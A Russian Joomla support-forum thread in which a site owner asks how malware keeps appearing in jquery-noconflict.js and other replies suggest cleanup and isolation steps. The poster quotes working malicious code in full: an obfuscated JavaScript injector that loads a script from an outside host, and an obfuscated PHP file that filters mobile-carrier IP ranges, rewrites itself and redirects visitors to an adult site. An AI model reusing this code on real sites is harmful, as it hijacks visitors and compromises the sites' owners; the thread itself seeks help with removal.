Форум русской поддержки Joomla!® CMS
06.12.2016, 16:15:05 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

Joomla 3 вирус в файле jquery-noconflict.js

 (Прочитано 894 раз)
0 Пользователей и 1 Гость смотрят эту тему.
harddrop
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 31


Король Кролей


« : 10.05.2015, 13:31:52 »

Вирус какимто образом записывается в фаил "jquery-noconflict.js"
www/media/jui/js/jquery-noconflict.js

Код:
//k27NvFydHMaaxsw
t=0;tx='Code';tv='wri';while(t<106)document[tv+'te'](String['fromChar'+tx]('=tdsjqu!tsd>#iuuq;00uftu/blwbipmejoh/cj{0dpnqpofout0dpn`xsbqqfs0tubu/qiq#!uzqf>#ufyu0kbwbtdsjqu#?=0tdsjqu?'['char'+tx+'At'](t++)-1))
//hHKRt1vHRsGRpwcn

Не могу понять где искать
Joomla последняя
логи чистые (
недавно обновлял не помогло

Записан
vipiusss
Профи
********

Репутация: +260/-8
Offline Offline

Пол: Мужской
Сообщений: 4572


Skype: renor_


« Ответ #1 : 10.05.2015, 13:56:18 »

у вас к2 не стоит? в медиа папку есть доступ извне? права какие на папку и как у вас этот скрипт оказался?
Записан
harddrop
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 31


Король Кролей


« Ответ #2 : 10.05.2015, 14:16:20 »

K2 - никогда и не стоял
Права на папку 755
как этот скрипт туда попадает не знаю (
Видать какой то бот записывает
Записан
wishlight
Профи
********

Репутация: +200/-1
Online Online

Пол: Мужской
Сообщений: 3487


skype aqaus.com


« Ответ #3 : 10.05.2015, 14:17:04 »

Сколько сайтов на хостинге? Версии Joomla какие? Какие были до обновления?
Записан
vipiusss
Профи
********

Репутация: +260/-8
Offline Offline

Пол: Мужской
Сообщений: 4572


Skype: renor_


« Ответ #4 : 10.05.2015, 14:21:49 »

удалите скрипт.
если вы считаете, что бот создаёт, узнайте по какой причине.
найдите бот и дайте ему п...ы.
я бы проверил папку темплейт и систем.
Записан
harddrop
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 31


Король Кролей


« Ответ #5 : 10.05.2015, 20:06:00 »

Сколько сайтов на хостинге? Версии Joomla какие? Какие были до обновления?

много сайтов но там где удалил он больше не появляется
Записан
vipiusss
Профи
********

Репутация: +260/-8
Offline Offline

Пол: Мужской
Сообщений: 4572


Skype: renor_


« Ответ #6 : 10.05.2015, 20:07:34 »

респект
Записан
harddrop
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 31


Король Кролей


« Ответ #7 : 10.05.2015, 20:08:07 »

удалите скрипт.
если вы считаете, что бот создаёт, узнайте по какой причине.
найдите бот и дайте ему п...ы.
я бы проверил папку темплейт и систем.

Как отследить бот если в логах ничего нет ?
Записан
vipiusss
Профи
********

Репутация: +260/-8
Offline Offline

Пол: Мужской
Сообщений: 4572


Skype: renor_


« Ответ #8 : 10.05.2015, 20:11:29 »

напишите хосту, узнайте, как в лог лезет.
или сделайте ваш код, которырый проверяет пути
Записан
harddrop
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 31


Король Кролей


« Ответ #9 : 18.05.2015, 17:53:09 »

Также на хостинге данного сайта замечен фаил stat.php
с кодом:
Код:
<? $GLOBALS['_1847300369_']=Array('he' .'a' .'d' .'er','' .'json' .'_' .'decod' .'e','' .'erro' .'r_r' .'eporting','pre' .'g_' .'m' .'atch','stristr','tr' .'im','a' .'rray_shi' .'ft','explo' .'de','' .'stripos','s' .'ub' .'str','' .'pr' .'eg_m' .'at' .'ch','' .'preg_m' .'atc' .'h','pr' .'eg_match','strpos','e' .'xplode','strpo' .'s','str_re' .'place','ip' .'2lo' .'n' .'g','ip2long','ip2long','e' .'xp' .'l' .'ode','c' .'ou' .'nt','s' .'p' .'rin' .'tf','' .'ip2' .'long','ip' .'2long','' .'po' .'w','s' .'trpos','s' .'tr' .'_re' .'pl' .'a' .'c' .'e','str' .'_replac' .'e','strpos','explode','' .'s' .'prin' .'tf','i' .'p2' .'long','sprint' .'f','ip2' .'lo' .'ng','s' .'print' .'f','i' .'p2long','' .'preg_matc' .'h','' .'p' .'re' .'g_' .'m' .'at' .'ch','ba' .'sen' .'a' .'m' .'e','' .'fi' .'lemtim' .'e','file_g' .'et_c' .'o' .'nte' .'n' .'ts','file_put' .'_co' .'nten' .'ts','to' .'uc' .'h','' .'head' .'e' .'r','hea' .'der'); ?><? function _802019820($i){$a=Array("content-type: application/x-javascript",'[{"1":"194.54.148.8/32"},{"1":"195.74.84.32/32"},{"1":"213.87.112.0/23"},{"1":"213.87.114.0/23"},{"1":"213.87.118.0/23"},{"1":"213.87.120.0/22"},{"1":"213.87.124.0/24"},{"1":"213.87.125.0/24"},{"1":"213.87.128.0/20"},{"1":"213.87.240.0/22"},{"1":"213.87.54.0/23"},{"1":"213.87.6.8/32"},{"1":"213.87.65.5/32"},{"1":"213.87.65.6/32"},{"1":"213.87.74.0/24"},{"1":"213.87.76.0/24"},{"1":"213.87.77.0/24"},{"1":"213.87.8.0/21"},{"1":"213.87.80.0/21"},{"1":"213.87.94.0/23"},{"1":"217.66.145.15/32"},{"1":"217.66.145.16/32"},{"1":"217.66.146.0/24"},{"1":"217.66.147.0/24"},{"1":"217.66.148.0/22"},{"1":"217.66.152.0/24"},{"1":"217.66.156.0/24"},{"1":"217.66.157.0/24"},{"1":"217.66.158.0/24"},{"1":"217.66.159.0/24"},{"1":"217.74.244.128/25"},{"1":"217.74.244.13/32"},{"1":"217.74.245.0/24"},{"1":"217.74.247.128/25"},{"1":"217.74.248.0/22"},{"1":"217.74.252.0/23"},{"1":"217.8.226.0/23"},{"1":"217.8.228.0/22"},{"1":"217.8.232.0/23"},{"1":"217.8.234.0/24"},{"1":"217.8.235.194/32"},{"1":"217.8.236.11/32"},{"1":"217.8.238.0/24"},{"1":"217.8.239.0/24"},{"1":"80.83.224.0/25"},{"1":"80.83.228.0/22"},{"1":"80.83.232.0/23"},{"1":"80.83.237.0/25"},{"1":"80.83.238.0/25"},{"1":"80.83.238.246/32"},{"1":"80.83.239.0/25"},{"1":"84.17.224.252/32"},{"1":"84.17.254.0/23"},{"1":"95.153.160.0/19"},{"1":"95.153.250.0/23"},{"1":"95.153.252.0/22"},{"2":"83.149.8.0/23"},{"2":"83.149.21.0/24"},{"2":"85.26.164.0/23"},{"2":"83.149.25.0/24"},{"2":"83.149.52.0/22"},{"2":"78.25.92.0/24"},{"2":"78.25.93.0/24"},{"2":"85.26.227.0/24"},{"2":"85.26.228.0/24"},{"2":"85.26.229.0/24"},{"2":"85.26.230.0/24"},{"2":"46.229.140.0/24"},{"2":"46.229.141.0/24"},{"2":"83.149.44.0/23"},{"2":"83.149.46.0/23"},{"2":"78.25.120.0/22"},{"2":"193.201.231.2/32"},{"2":"46.229.132.0/24"},{"2":"46.229.133.0/24"},{"2":"46.229.134.0/24"},{"2":"78.25.88.0/22"},{"2":"83.149.1.192/30"},{"2":"83.149.1.196/30"},{"2":"83.149.1.200/29"},{"2":"83.149.2.0/23"},{"2":"83.149.24.64/26"},{"2":"83.149.34.128/25"},{"2":"83.149.35.0/24"},{"2":"83.149.36.0/25"},{"2":"83.149.36.128/25"},{"2":"83.149.38.0/24"},{"2":"83.149.43.128/25"},{"2":"83.149.48.0/25"},{"2":"85.26.155.0/24"},{"2":"85.26.183.0/24"},{"2":"85.26.184.0/24"},{"2":"85.26.186.0/24"},{"2":"85.26.192.0/24"},{"2":"85.26.193.0/24"},{"2":"85.26.194.0/24"},{"2":"85.26.195.0/24"},{"2":"85.26.224.0/26"},{"2":"85.26.231.0/25"},{"2":"85.26.232.0/23"},{"2":"85.26.234.0/23"},{"2":"85.26.241.0/24"},{"3":"217.168.176.0/24"},{"3":"217.168.176.18/32"},{"3":"217.168.179.0/24"},{"3":"217.168.184.0/24"},{"3":"217.168.185.0/24"},{"3":"217.168.186.0/24"},{"3":"217.168.187.0/24"},{"3":"217.168.188.0/24"},{"3":"217.168.189.0/24"},{"3":"217.168.190.0/24"},{"3":"217.168.191.0/24"},{"3":"5.191.0.0/16"},{"3":"5.44.32.0/21"},{"3":"176.28.80.0/21"},{"3":"77.244.112.0/20"},{"2":"83.149.49.0/27"},{"2":"85.26.231.128/27"},{"2":"83.149.48.128/28"},{"2":"83.149.48.160/28"},{"2":"83.149.49.209/32"},{"2":"83.149.49.212/32"},{"2":"78.25.94.0/24"},{"2":"78.25.95.0/24"},{"2":"37.29.86.0/24"},{"2":"37.29.87.0/24"},{"2":"83.149.0.228/32"},{"2":"83.149.28.0/24"},{"2":"83.149.36.0/24"},{"2":"83.149.37.0/24"},{"2":"83.149.52.10/32"},{"2":"37.28.187.0/24"},{"2":"37.28.185.0/24"},{"2":"185.3.34.0/23"},{"2":"185.3.32.0/23"},{"2":"83.149.44.0/22"},{"2":"83.149.41.0/24"},{"2":"83.149.24.252/32"},{"2":"83.149.24.251/32"},{"2":"83.149.24.249/32"},{"2":"46.229.142.128/25"},{"1":"213.87.54.0/24"},{"1":"213.87.55.0/24"},{"1":"213.87.72.73/32"},{"1":"213.87.80.0/20"},{"1":"213.87.94.0/24"},{"1":"213.87.95.0/24"},{"1":"217.66.146.0/26"},{"1":"217.66.148.0/24"},{"1":"217.66.149.0/24"},{"1":"217.66.150.0/24"},{"1":"217.66.151.0/24"},{"1":"217.66.155.0/24"},{"1":"217.74.246.0/23"},{"1":"217.8.228.0/23"},{"1":"217.8.230.0/23"},{"1":"95.153.192.0/20"},{"1":"95.153.208.0/21"},{"1":"95.153.244.0/22"},{"1":"95.153.248.0/21"},{"2":"85.26.191.128/25"},{"2":"85.26.189.0/24"},{"2":"85.26.185.0/24"},{"2":"85.26.184.0/25"},{"2":"85.26.179.0/24"},{"2":"85.26.177.0/24"},{"2":"85.26.176.0/24"},{"2":"83.169.252.0/22"},{"2":"46.232.202.0/23"},{"1":"213.87.248.0/22"},{"1":"213.87.104.0/23"},{"1":"213.87.100.0/22"},{"1":"213.87.96.0/23"},{"1":"213.87.116.0/23"},{"2":"83.149.52.40/29"},{"2":"83.149.52.36/30"},{"2":"83.149.52.34/31"},{"2":"83.149.1.208/29"},{"2":"46.229.142.0/24"},{"2":"185.3.32.0/22"},{"2":"37.29.48.0/21"},{"2":"37.29.88.0/24"},{"2":"46.29.192.0/21"},{"2":"83.149.19.0/24"},{"2":"37.29.96.0/20"},{"4":"85.115.248.0/24"},{"4":"85.115.243.32/27"},{"4":"85.115.224.9/32"},{"4":"85.115.224.128/27"},{"4":"85.115.224.10/32"},{"4":"83.220.227.0/24"},{"4":"62.33.151.0/24"},{"4":"46.16.96.0/21"},{"4":"217.118.93.0/24"},{"4":"217.118.92.0/24"},{"4":"217.118.91.64/26"},{"4":"217.118.90.0/24"},{"4":"217.118.89.0/24"},{"4":"217.118.85.64/28"},{"4":"217.118.85.0/24"},{"4":"217.118.83.0/24"},{"4":"217.118.82.64/26"},{"4":"217.118.82.32/28"},{"4":"217.118.82.16/28"},{"4":"217.118.81.0/24"},{"4":"217.118.80.0/24"},{"4":"217.118.79.0/24"},{"4":"217.118.78.0/24"},{"4":"217.118.66.0/24"},{"4":"217.118.64.32/28"},{"4":"217.118.64.32/27"},{"4":"85.115.234.0/23"},{"2":"37.29.40.0/24"},{"2":"37.29.41.0/24"},{"2":"37.29.118.0/24"},{"4":"83.220.236.0/22"},{"4":"217.118.95.0/24"},{"4":"217.148.194.128/28"},{"4":"31.13.144.0/26"},{"4":"85.115.224.11/32"},{"4":"85.115.224.12/32"},{"4":"85.115.224.13/32"},{"4":"85.115.224.14/32"},{"4":"85.115.224.192/26"},{"4":"217.118.82.128/25"},{"4":"217.118.85.64/32"},{"3":"5.153.30.100/32"}]','CLIENT_IP','FORWARDED','FORWARDED_FOR','FORWARDED_FOR_IP','HTTP_CLIENT_IP','HTTP_FORWARDED','HTTP_FORWARDED_FOR','HTTP_FORWARDED_FOR_IP','HTTP_PC_REMOTE_ADDR','HTTP_PROXY_CONNECTION','HTTP_VIA','HTTP_X_FORWARDED','HTTP_X_FORWARDED_FOR','HTTP_X_FORWARDED_FOR_IP','HTTP_X_IMFORWARDS','HTTP_XROXY_CONNECTION','VIA','X_FORWARDED','X_FORWARDED_FOR',"/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/",',',',',':',"/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/",'REMOTE_ADDR',"#([0-9]+\.).*#","10.","100.",'REMOTE_ADDR',"#([0-9]+\.[0-9]+\.).*#","192.168.",'REMOTE_ADDR','/','/','.','*','0','.','0',"%u.%u.%u.%u",'0','0','0','0','*','*','0','*','255','-','-',"%u","%u","%u",'HTTP_USER_AGENT',"#Windows NT|Macintosh|ipad|tablet#is","#Windows NT|Macintosh#is",'HTTP_UP',"PHP_SELF","HTTP_UP","r: ok","v: 10",'document.location.href = "http://4sexdream.ru";');return $a[$i];} ?><?php $GLOBALS['_1847300369_'][0](_802019820(0));$_0=$GLOBALS['_1847300369_'][1](_802019820(1),round(0+0.25+0.25+0.25+0.25));function l__0(){$_1=false;$GLOBALS['_1847300369_'][2](E_ERROR);$_2=array(_802019820(2),_802019820(3),_802019820(4),_802019820(5),_802019820(6),_802019820(7),_802019820(8),_802019820(9),_802019820(10),_802019820(11),_802019820(12),_802019820(13),_802019820(14),_802019820(15),_802019820(16),_802019820(17),_802019820(18),_802019820(19),_802019820(20));foreach($_2 as $_3){if($_1 !== false)continue;if(isset($_SERVER[$_3])&& $GLOBALS['_1847300369_'][3](_802019820(21),$_SERVER[$_3])){$_1=$_SERVER[$_3];continue;}else if($GLOBALS['_1847300369_'][4](_802019820(22),$_SERVER[$_3])!== FALSE){$_4=$GLOBALS['_1847300369_'][5]($GLOBALS['_1847300369_'][6]($GLOBALS['_1847300369_'][7](_802019820(23),$_SERVER[$_3])));if(($_5=$GLOBALS['_1847300369_'][8]($_4,_802019820(24)))!== FALSE)$_4=$GLOBALS['_1847300369_'][9]($_4,round(0),$_5);if($GLOBALS['_1847300369_'][10](_802019820(25),$_4)){$_1=$_SERVER[$_3];continue;}}}if($_1 === false){$_1=$_SERVER[_802019820(26)];}if($GLOBALS['_1847300369_'][11](_802019820(27),$_1,$_6)){if($_6[round(0+0.25+0.25+0.25+0.25)]== _802019820(28)|| $_6[round(0+0.5+0.5)]== _802019820(29)){$_1=$_SERVER[_802019820(30)];}}if($GLOBALS['_1847300369_'][12](_802019820(31),$_1,$_6)){if($_6[round(0+0.2+0.2+0.2+0.2+0.2)]== _802019820(32)){$_1=$_SERVER[_802019820(33)];}}return $_1;}function l__1($_7,$_8){if($GLOBALS['_1847300369_'][13]($_8,_802019820(34))!== false){list($_8,$_9)=$GLOBALS['_1847300369_'][14](_802019820(35),$_8,round(0+0.4+0.4+0.4+0.4+0.4));if($GLOBALS['_1847300369_'][15]($_9,_802019820(36))!== false){$_9=$GLOBALS['_1847300369_'][16](_802019820(37),_802019820(38),$_9);$_10=$GLOBALS['_1847300369_'][17]($_9);return(($GLOBALS['_1847300369_'][18]($_7)&$_10)==($GLOBALS['_1847300369_'][19]($_8)&$_10));}else{$_11=$GLOBALS['_1847300369_'][20](_802019820(39),$_8);while($GLOBALS['_1847300369_'][21]($_11)<round(0+1+1+1+1))$_11[]=_802019820(40);list($_12,$_13,$_14,$_15)=$_11;$_8=$GLOBALS['_1847300369_'][22](_802019820(41),empty($_12)?_802019820(42):$_12,empty($_13)?_802019820(43):$_13,empty($_14)?_802019820(44):$_14,empty($_15)?_802019820(45):$_15);$_16=$GLOBALS['_1847300369_'][23]($_8);$_17=$GLOBALS['_1847300369_'][24]($_7);$_18=$GLOBALS['_1847300369_'][25](round(0+0.5+0.5+0.5+0.5),(round(0+16+16)-$_9))-round(0+1);$_10=~$_18;return(($_17&$_10)==($_16&$_10));}}else{if($GLOBALS['_1847300369_'][26]($_8,_802019820(46))!==false){$_19=$GLOBALS['_1847300369_'][27](_802019820(47),_802019820(48),$_8);$_20=$GLOBALS['_1847300369_'][28](_802019820(49),_802019820(50),$_8);$_8="$_19-$_20";}if($GLOBALS['_1847300369_'][29]($_8,_802019820(51))!==false){list($_19,$_20)=$GLOBALS['_1847300369_'][30](_802019820(52),$_8,round(0+0.4+0.4+0.4+0.4+0.4));$_21=(float)$GLOBALS['_1847300369_'][31](_802019820(53),$GLOBALS['_1847300369_'][32]($_19));$_22=(float)$GLOBALS['_1847300369_'][33](_802019820(54),$GLOBALS['_1847300369_'][34]($_20));$_17=(float)$GLOBALS['_1847300369_'][35](_802019820(55),$GLOBALS['_1847300369_'][36]($_7));return(($_17>=$_21)&&($_17<=$_22));}return false;}}function l__2(){global $_0;$_23=l__0();$_24=$_SERVER[_802019820(56)];foreach($_0 as $_25){foreach($_25 as $_26=>$_27){if(l__1($_23,$_27)){if($_26 == round(0+2+2)|| $_26 == round(0+0.25+0.25+0.25+0.25)){if(l__3($_24,$_26)){return false;}}return true;}}}return false;}function l__3($_24,$_28){if($GLOBALS['_1847300369_'][37](_802019820(57),$_24)&& $_28 == round(0+0.8+0.8+0.8+0.8+0.8)){return true;}else if($GLOBALS['_1847300369_'][38](_802019820(58),$_24)&& $_28 == round(0+1)){return true;}return false;}if(isset($_SERVER[_802019820(59)])){$_29=$GLOBALS['_1847300369_'][39]($_SERVER[_802019820(60)]);$_30=$GLOBALS['_1847300369_'][40]($_29);if($_31=$GLOBALS['_1847300369_'][41]($_SERVER[_802019820(61)])){$GLOBALS['_1847300369_'][42]($_29,$_31);};$GLOBALS['_1847300369_'][43]($_29,$_30);$GLOBALS['_1847300369_'][44](_802019820(62));exit();}$GLOBALS['_1847300369_'][45](_802019820(63));if(l__2()){echo _802019820(64);}
Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3530


« Ответ #10 : 18.05.2015, 23:20:24 »

много сайтов но там где удалил он больше не появляется
Вам сайты надо разграничивать если у вас шарада хост и нет возможности разделения по пользователям сайтов, то вам переезжать надо на vps/vds.
А искать уже поздно, требуется чистить и обновлять все сайты сколько у вас есть.
Записан
wishlight
Профи
********

Репутация: +200/-1
Online Online

Пол: Мужской
Сообщений: 3487


skype aqaus.com


« Ответ #11 : 19.05.2015, 08:13:15 »

ssh доступ есть? Если есть, то можно попробовать ai-bolit на все сайты запустить.
Записан
x1
Давно я тут
****

Репутация: +13/-0
Offline Offline

Сообщений: 363


« Ответ #12 : 26.05.2015, 23:51:49 »

А искать уже поздно
Я бы не был так категоричен. Я пользуюсь для контроля таким способом - держу копию сайта на Денвере и если что - просто сравниваю содержимое файлов с помощью Beyond Compare. Вредоносный код отслеживается сразу: в файлах, скриптах и в дампах базы. Конечно на уязвимость - как это лезет - ответа не даст.
Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3530


« Ответ #13 : 27.05.2015, 09:58:17 »

Я бы не был так категоричен. Я пользуюсь для контроля таким способом - держу копию сайта на Денвере и если что - просто сравниваю содержимое файлов с помощью Beyond Compare. Вредоносный код отслеживается сразу: в файлах, скриптах и в дампах базы. Конечно на уязвимость - как это лезет - ответа не даст.
Есть выражение
- Поздно пить боржоми когда почки отказали
Надо стараться предотвращать, полностью не получится, но пытаться изначально все сделать и минимизировать риски.
По поводу
Цитировать
А искать уже поздно
Надо изначально устранять вредоносный код, обновлять все что возможно, настраивать разграничения разделяя сайты и потом смотреть логи на счет проникновения и прочего.
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 725


Свободен для работы


« Ответ #14 : 30.05.2015, 00:20:33 »

K2 - никогда и не стоял
Права на папку 755
как этот скрипт туда попадает не знаю (
Видать какой то бот записывает
Как отследить бот если в логах ничего нет ?
Посмотрите на дату создания и на дату изменения файлов, затем в логах просмотрите ИП совпадения по обращению к другим файлом(если бот, то полюбому чекал на валидность), по идее требуется большой комплекс работ, по устранению вашей проблемы и влетит в копеечку..., ну и естественно прийдется на всех сайтах менять пароли..., там только Joomla присутствует или еще сайты на других CMS?
Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet